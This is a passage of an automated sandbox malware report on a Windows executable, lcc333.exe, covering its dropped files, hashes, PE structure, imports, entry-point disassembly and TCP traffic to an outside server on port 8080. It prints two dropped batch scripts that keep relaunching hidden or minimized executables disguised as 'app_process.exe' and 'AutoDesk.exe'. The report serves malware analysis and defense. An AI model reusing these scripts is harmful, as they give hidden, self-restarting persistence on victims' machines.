                                                                                                                                                        SHA-512:4716E598E4B930A0EC89F4D826AFAA3DADE22CF002111340BC253A618231E88F2F5247F918F993ED15B8CE0E3A97D6838C12B17616913E48334EE9B713C1957A
                                                                                                                                                        Malicious:true
                                                                                                                                                        Yara Hits:
                                                                                                                                                        • Rule: JoeSecurity_NirCmd, Description: Yara detected NirCmd tool, Source: C:\Windows\System32\nircmd.exe, Author: Joe Security
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............c.X.c.X.c.X...X.c.X...X.c.X...X.c.X...X.c.X...X.c.X...X.c.X.c.X.b.X...X.c.X...X.c.X...X.c.XRich.c.X........................PE..d.....'f..........#......R...~......P\.........@....................................;...................................................................8............................w...............................................p..X............................text...#P.......R.................. ..`.rdata...^...p...`...V..............@..@.data...............................@....pdata..............................@..@.rsrc...8...........................@..@........................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Windows\System32\play.bat

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\lcc333.exe
                                                                                                                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):163
                                                                                                                                                        Entropy (8bit):4.670779724935605
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:mKDD6rNWvgCvL6NWvgCvRK2Rp/hNviAnW+ybgLgXns1z:hWtCviCvE2v/DKAW10Wn8z
                                                                                                                                                        MD5:646CD5E35BB6CF2A620A7E594722A8B0
                                                                                                                                                        SHA1:920BC21D5F3FB04342A4424C3CF50FF2C1F937FB
                                                                                                                                                        SHA-256:3005A8A0AF8A9BFEB184670F2910FBE4B4D183A0F4F2F933C4659C70DD79BB53
                                                                                                                                                        SHA-512:79FE176BBC0D36DB5E065FBA080E1B3F95BDF36E8B0095A4161CB034F4C3DB9EEB845011AFFE42B6EC8EC0582604A89C116AEC7615315ABA3754D38804245C4F
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:@echo off..:loop..nircmd exec hide "app_process.exe"..nircmd exec hide "app_process.exe"..timeout /t 600 >nul..taskkill /f /im app_process.exe >nul 2>&1..goto loop

                                                                                                                                                        C:\Windows\System32\python.bat

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\lcc333.exe
                                                                                                                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):181
                                                                                                                                                        Entropy (8bit):5.297300378946428
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:mKDD6oTsKhAWeDn00hxZIiSQmzpnhAXN9RK2Ru/RviAnWeVRXns1Evn:hWYan00HHSQmtWXNzK2qRKAW6n8G
                                                                                                                                                        MD5:206F998CD5F8D6FD35ED6C487480145D
                                                                                                                                                        SHA1:09B36B86387A42173ED061D7287AADAC90ADFF87
                                                                                                                                                        SHA-256:44FA9DE617C314B79B84428A8B6E53206070BBCB1D1FB68126E3C758684027F7
                                                                                                                                                        SHA-512:9FDB5EF78EFB09EDB38419B6F179AE0D2CE19E373335859718DCD1E5E50F050BA4DC4FA2C2EF27A2175880424DBBE7C56BC431434E5EA9F0CA802B330C016B6E
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:@echo off..:loop..start /min "" cmd /c "AutoDesk.exe --pubkey BQQYZKHfNhmUrdU2UhwZzWdVpiVzdBCa3qLerhDrcbAs"..timeout /t 120 >nul..taskkill /f /im AutoDesk.exe >nul 2>&1..goto loop..

                                                                                                                                                        \Device\Null

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\timeout.exe
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.41440934524794
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:hYFLKAR+mQRKVxLZttS:hYFLMaNZ6
                                                                                                                                                        MD5:9B5BC08EF53C0087BAFF1B374B7B15EA
                                                                                                                                                        SHA1:D78A75DC8DC7BF0065B74B891C8E63B9F17C2EEE
                                                                                                                                                        SHA-256:453A368AEFAD7831978F2E3249CD31F25E619872DFCD7A3298067B478A377E3B
                                                                                                                                                        SHA-512:2FE8E532D935A21749DD136ADE868CB21DA89D8A0BEF6BF473529A07478CE8CFA8E7089F66736A6F87E4C02B14B83F8AC3B9854069557B3019A0E0447542D10B
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..Waiting for 600 seconds, press a key to continue ......599

                                                                                                                                                        Static File Info

                                                                                                                                                        General

                                                                                                                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Entropy (8bit):7.992106654803597
                                                                                                                                                        TrID:
                                                                                                                                                        • Win64 Executable GUI (202006/5) 77.37%
                                                                                                                                                        • InstallShield setup (43055/19) 16.49%
                                                                                                                                                        • Win64 Executable (generic) (12005/4) 4.60%
                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.77%
                                                                                                                                                        • DOS Executable Generic (2002/1) 0.77%
                                                                                                                                                        File name:lcc333.exe
                                                                                                                                                        File size:8'547'394 bytes
                                                                                                                                                        MD5:a236cdec4dd41fb49c3b5afc64b6f878
                                                                                                                                                        SHA1:0ab0f158a5034f2a21f387e5c57d3b2cf667c720
                                                                                                                                                        SHA256:015338b4f158c874c7b2bb20e1bb8f465d5679037efe5a21ba2c06cb6dc07a4d
                                                                                                                                                        SHA512:c89366e7d32e977810483113bd7f89d94197d697fd94dc9dfa3771c87a124ae0dfd40428dad01fc400518bef2f16bf7714a2e016b2b062b14df3df1c0e027d82
                                                                                                                                                        SSDEEP:196608:fbCOwVEo+2XMCHGLLc54i1wN+4jXx5nDasqWQ2dTNUGqlS+iITxemA60x:zCVVEb2XMCHWUjQjx5WsqWxTwDT8iA
                                                                                                                                                        TLSH:7486335553E04CE5F8F7443D98A6945ABA72F8570764CA9F939C12E20E332D0BE7CB22
                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Zpc.Zpc.Zpc...`.]pc...f..pc...g.Ppc.....Ypc...`.Spc...g.Kpc...f.rpc...b.Qpc.Zpb..pc.O.g.Cpc.O.a.[pc.RichZpc.........PE..d..

                                                                                                                                                        File Icon

                                                                                                                                                        Icon Hash:4a464cd47461e179

                                                                                                                                                        Static PE Info

                                                                                                                                                        General

                                                                                                                                                        Entrypoint:0x14000cdb0
                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                        Digitally signed:false
                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                        Time Stamp:0x67394460 [Sun Nov 17 01:18:24 2024 UTC]
                                                                                                                                                        TLS Callbacks:
                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                        OS Version Major:6
                                                                                                                                                        OS Version Minor:0
                                                                                                                                                        File Version Major:6
                                                                                                                                                        File Version Minor:0
                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                        Import Hash:72c4e339b7af8ab1ed2eb3821c98713a

                                                                                                                                                        Entrypoint Preview

                                                                                                                                                        Instruction
                                                                                                                                                        dec eax
                                                                                                                                                        sub esp, 28h
                                                                                                                                                        call 00007F8C50CF44ACh
                                                                                                                                                        dec eax
                                                                                                                                                        add esp, 28h
                                                                                                                                                        jmp 00007F8C50CF40CFh
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        dec eax
                                                                                                                                                        sub esp, 28h
                                                                                                                                                        call 00007F8C50CF4878h
                                                                                                                                                        test eax, eax
                                                                                                                                                        je 00007F8C50CF4273h
                                                                                                                                                        dec eax
                                                                                                                                                        mov eax, dword ptr [00000030h]
                                                                                                                                                        dec eax
                                                                                                                                                        mov ecx, dword ptr [eax+08h]
                                                                                                                                                        jmp 00007F8C50CF4257h
                                                                                                                                                        dec eax
                                                                                                                                                        cmp ecx, eax
                                                                                                                                                        je 00007F8C50CF4266h
                                                                                                                                                        xor eax, eax
                                                                                                                                                        dec eax
                                                                                                                                                        cmpxchg dword ptr [0003577Ch], ecx
                                                                                                                                                        jne 00007F8C50CF4240h
                                                                                                                                                        xor al, al
                                                                                                                                                        dec eax
                                                                                                                                                        add esp, 28h
                                                                                                                                                        ret
                                                                                                                                                        mov al, 01h
                                                                                                                                                        jmp 00007F8C50CF4249h
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        dec eax
                                                                                                                                                        sub esp, 28h
                                                                                                                                                        test ecx, ecx
                                                                                                                                                        jne 00007F8C50CF4259h
                                                                                                                                                        mov byte ptr [00035765h], 00000001h
                                                                                                                                                        call 00007F8C50CF39A5h
                                                                                                                                                        call 00007F8C50CF4C90h
                                                                                                                                                        test al, al
                                                                                                                                                        jne 00007F8C50CF4256h
                                                                                                                                                        xor al, al
                                                                                                                                                        jmp 00007F8C50CF4266h
                                                                                                                                                        call 00007F8C50D017AFh
                                                                                                                                                        test al, al
                                                                                                                                                        jne 00007F8C50CF425Bh
                                                                                                                                                        xor ecx, ecx
                                                                                                                                                        call 00007F8C50CF4CA0h
                                                                                                                                                        jmp 00007F8C50CF423Ch
                                                                                                                                                        mov al, 01h
                                                                                                                                                        dec eax
                                                                                                                                                        add esp, 28h
                                                                                                                                                        ret
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        inc eax
                                                                                                                                                        push ebx
                                                                                                                                                        dec eax
                                                                                                                                                        sub esp, 20h
                                                                                                                                                        cmp byte ptr [0003572Ch], 00000000h
                                                                                                                                                        mov ebx, ecx
                                                                                                                                                        jne 00007F8C50CF42B9h
                                                                                                                                                        cmp ecx, 01h
                                                                                                                                                        jnbe 00007F8C50CF42BCh
                                                                                                                                                        call 00007F8C50CF47EEh
                                                                                                                                                        test eax, eax
                                                                                                                                                        je 00007F8C50CF427Ah
                                                                                                                                                        test ebx, ebx
                                                                                                                                                        jne 00007F8C50CF4276h
                                                                                                                                                        dec eax
                                                                                                                                                        lea ecx, dword ptr [00035716h]
                                                                                                                                                        call 00007F8C50D015A2h

                                                                                                                                                        Data Directories

                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3ca5c0x78.rdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000xf41c.rsrc
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x440000x2250.pdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x570000x764.reloc
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x3a0800x1c.rdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39f400x140.rdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x4a0.rdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                        Sections

                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                        .text0x10000x29f000x2a000a6c3b829cc8eaabb1a474c227e90407fFalse0.5514206659226191data6.487493643901088IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                        .rdata0x2b0000x12a500x12c00710a02610520a5943746947c566dd7f3False0.5245182291666667data5.752797715215106IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                        .data0x3e0000x53f80xe00dba0caeecab624a0ccc0d577241601d1False0.134765625data1.8392217063172436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                        .pdata0x440000x22500x2400181312260a85d10a1454ba38901c499bFalse0.4705946180555556data5.290347578351011IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                        .rsrc0x470000xf41c0xf600455788c285fcfdcb4008bc77e762818aFalse0.803099593495935data7.5549760623589695IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                        .reloc0x570000x7640x800816c68eeb419ee2c08656c31c06a0fffFalse0.5576171875data5.2809528666624175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                        Resources

                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                        RT_ICON0x472080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.585820895522388
                                                                                                                                                        RT_ICON0x480b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.7360108303249098
                                                                                                                                                        RT_ICON0x489580x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.755057803468208
                                                                                                                                                        RT_ICON0x48ec00x952cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9975384937676757
                                                                                                                                                        RT_ICON0x523ec0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.3887966804979253
                                                                                                                                                        RT_ICON0x549940x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.49530956848030017
                                                                                                                                                        RT_ICON0x55a3c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.7207446808510638
                                                                                                                                                        RT_GROUP_ICON0x55ea40x68data0.7019230769230769
                                                                                                                                                        RT_MANIFEST0x55f0c0x50dXML 1.0 document, ASCII text0.4694508894044857

                                                                                                                                                        Imports

                                                                                                                                                        DLLImport
                                                                                                                                                        USER32.dllCreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                        COMCTL32.dll
                                                                                                                                                        KERNEL32.dllGetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
                                                                                                                                                        ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                        GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW

                                                                                                                                                        Network Behavior

                                                                                                                                                        Network Port Distribution

                                                                                                                                                        TCP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Nov 25, 2024 11:10:15.445146084 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:15.565165997 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:15.565269947 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:15.565526962 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:15.684988022 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.086344957 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.086384058 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.086400032 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.086415052 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.086437941 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.086468935 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.086474895 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.086484909 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.086502075 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.086517096 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.086533070 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.086538076 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.086546898 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.086580038 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.086612940 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.206221104 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.206279039 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.206353903 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.306248903 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.306266069 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.306416035 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.308623075 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.308706045 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.308798075 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.317022085 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.317140102 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.317275047 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.325392962 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.325485945 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.325537920 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.333849907 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.333862066 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.333918095 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.342246056 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.342335939 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.342396021 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.350617886 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.350764036 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.350827932 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.359011889 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.359086990 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.359150887 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.367445946 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.367542982 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.367600918 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.375783920 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.375947952 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.376027107 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.384232998 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.384347916 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.384401083 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.425952911 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.426120043 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.426182032 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.498234987 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.498296022 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.498352051 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.525733948 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.525826931 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.525911093 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.528553009 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.529592037 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.529676914 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.529680014 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.535309076 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.535347939 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.535387039 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.540958881 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.541040897 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.541114092 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.546617985 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.546708107 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.546763897 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.552294970 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.552365065 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.552402020 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.558149099 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.558202028 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.558228016 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.561851978 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.561923027 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.561970949 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.565623999 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.565682888 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.565732956 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.569538116 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.569588900 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.569602966 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.573249102 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.573333979 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.573358059 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.577177048 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.577241898 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.577254057 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.580894947 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.580981970 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.581003904 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.584655046 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.584767103 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.584837914 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.588610888 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.588684082 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.588707924 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.592370987 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.592438936 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.592515945 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.596120119 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.596182108 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:17.596209049 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.600395918 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.600428104 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:17.600461960 CET497058080192.168.2.543.199.41.35
